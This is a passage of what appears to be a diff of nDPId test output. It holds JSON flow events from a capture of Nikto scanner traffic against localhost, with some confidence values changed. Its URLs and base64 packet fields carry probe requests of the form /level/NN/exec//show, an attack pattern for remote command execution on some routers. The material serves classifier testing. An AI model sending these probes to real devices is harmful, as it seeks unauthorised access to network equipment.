{"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/89\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001336)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277723,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":1,"flow_last_seen":1576420277723,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277723,"pkt":"AAAAAAAAAAAAAAAACABFAADIo9hAAEAGmFV\/AAABfwAAAcaWH5BWPprB7Bx1PYAYAED+vAAAAQEICp1m\/wKdZv8CR0VUIC9sZXZlbC85MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277723,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/90\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001337)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277723,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/90\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001337)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":1,"flow_last_seen":1576420277725,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277725,"pkt":"AAAAAAAAAAAAAAAACABFAADI7YBAAEAGTq1\/AAABfwAAAcaYH5AUj9RqmT7XtIAYAED+vAAAAQEICp1m\/wWdZv8FR0VUIC9sZXZlbC85MS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/91\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001338)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/91\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001338)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":1,"flow_last_seen":1576420277727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277727,"pkt":"AAAAAAAAAAAAAAAACABFAADIYyZAAEAG2Qd\/AAABfwAAAcaaH5DSD1o0DsX43oAYAED+vAAAAQEICp1m\/wadZv8GR0VUIC9sZXZlbC85Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/92\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001339)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/92\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001339)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277729,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":1,"flow_last_seen":1576420277729,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277729,"pkt":"AAAAAAAAAAAAAAAACABFAADIxzpAAEAGdPN\/AAABfwAAAcacH5ALNv4hgWKnmoAYAED+vAAAAQEICp1m\/widZv8IR0VUIC9sZXZlbC85My9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277729,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/93\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001340)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277729,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/93\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001340)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":1,"flow_last_seen":1576420277730,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277730,"pkt":"AAAAAAAAAAAAAAAACABFAADIHv9AAEAGHS9\/AAABfwAAAcaeH5AL7Sfmt4JqA4AYAED+vAAAAQEICp1m\/wqdZv8KR0VUIC9sZXZlbC85NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzNDEpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/94\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001341)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/94\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001341)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277732,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":1,"flow_last_seen":1576420277732,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277732,"pkt":"AAAAAAAAAAAAAAAACABFAADIPWZAAEAG\/sd\/AAABfwAAAcagH5BD6AR+QNLU5oAYAED+vAAAAQEICp1m\/wydZv8MR0VUIC9sZXZlbC85NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277732,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/95\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001342)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277732,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/95\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001342)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":1,"flow_last_seen":1576420277734,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277734,"pkt":"AAAAAAAAAAAAAAAACABFAADISBNAAEAG9Bp\/AAABfwAAAcaiH5A0bnEJpPWxcYAYAED+vAAAAQEICp1m\/w6dZv8OR0VUIC9sZXZlbC85Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/96\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001343)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/96\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001343)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277736,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":1,"flow_last_seen":1576420277736,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277736,"pkt":"AAAAAAAAAAAAAAAACABFAADIC2JAAEAGMMx\/AAABfwAAAcakH5C2tzJ7p90VYYAYAED+vAAAAQEICp1m\/xCdZv8PR0VUIC9sZXZlbC85Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQ0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277736,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 